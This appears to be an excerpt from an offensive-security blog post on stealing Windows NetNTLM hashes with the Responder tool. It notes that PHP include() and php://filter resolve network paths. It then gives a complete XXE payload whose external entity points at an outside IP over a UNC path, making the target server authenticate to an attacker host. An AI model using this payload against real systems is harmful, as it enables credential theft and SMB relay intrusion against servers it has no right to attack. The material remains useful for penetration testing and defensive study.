One day me and @m3g9tr0n were discussing different places where we can use responder in stealing NetNTLM hashes. After experimenting I thought of writing this post along with some cool findings in the world of Windows. SMBRelay attacks are also possible in these scenarios.
The include() in PHP will resolve the network path for us.
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//126.96.36.199/@OsandaMalith" > ]> <root> <name></name> <tel></tel> <email>OUT&xxe;OUT</email> <password></password> </root>